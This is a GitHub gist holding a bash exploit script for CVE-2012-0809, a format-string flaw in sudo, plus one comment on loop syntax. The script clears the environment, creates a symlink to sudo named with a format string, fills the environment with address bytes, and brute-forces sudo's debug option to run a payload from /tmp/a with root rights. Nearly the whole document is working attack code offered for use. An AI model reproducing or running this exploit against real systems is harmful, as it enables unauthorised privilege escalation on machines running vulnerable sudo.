Skip to content

Instantly share code, notes, and snippets.

@joernchen
Created April 28, 2014 16:28
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save joernchen/618a8940894084102fe2 to your computer and use it in GitHub Desktop.
Save joernchen/618a8940894084102fe2 to your computer and use it in GitHub Desktop.
sudo.sh (CVE-2012-0809)
#!/bin/bash
# CVE-2012-0809 exploit
# joernchen of Phenoelit's version
# Payload to be executed goes to /tmp/a (might be a shell script)
cd /tmp
/bin/echo '-> Clearing ENV'
for i in `env |cut -f1 -d "="` ;do unset $i;done
/bin/echo '-> Creating symlink'
/bin/ln -s /usr/bin/sudo ./%134520134x%900\$n
/bin/echo '-> Setting ENV'
export AAA=AAAA;
export A;
for i in `/usr/bin/seq 1 5000`; do
export A=$A`echo -n -e '\x24\x83\x05\x08'`;
done;
/bin/echo '-> Now a little Brute-Force'
while true ; do SUDO_ASKPASS=/tmp/a ./%134520134x%900\$n -D9 -A id 2>/dev/null ; if [[ "$?" == "1" ]]; then break ;fi ; done
/bin/echo '-> Cleaning up'
/bin/rm /tmp/%134520134x%900\$n
@mathiasbynens
Copy link

for i in `/usr/bin/seq 1 5000`

for i in {1..5000}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment